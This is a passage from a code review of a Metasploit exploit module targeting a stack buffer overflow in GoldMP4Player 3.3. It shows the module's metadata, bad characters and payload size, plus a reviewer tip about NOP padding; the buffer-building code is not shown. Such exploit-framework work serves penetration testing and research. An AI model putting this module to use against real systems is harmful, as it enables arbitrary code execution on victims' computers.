modules/exploits/windows/fileformat/goldmp4player_url_bof.rb

```diff
@@ -0,0 +1,87 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GoldMP4Player URL Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability in
+        GoldMP4Player 3.3, caused by improper bounds checking of a URL.
+        By persuading the victim to copy the specially-crafted URL from the
+        resulting file and paste it into the Open Flash URL window, a remote
+        attacker could execute arbitrary code on the system or cause the
+        application to crash. This module has been tested successfully on
+        Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Gabor Seljan'  # Vulnerability discovery and Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'BID', '65855' ],
+          [ 'EDB', '31914' ],
+          [ 'EDB', '31972' ],
+          [ 'OSVDB', '103826' ]
+        ],
+      'DefaultOptions' =>
+        {
+          'ExitFunction' => 'process',
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'       => "\x00\x0a\x0d\x20",
+          'Space'          => 1024,
```

Comment:
If you're setting the ```Space``` field, worths to add ```'DisableNops' => true``` so the payload isn't prepended with nops instructions until the payload reaches 1024. Even when it shouldn't be a problem I remind having some issues with nops slides in the past.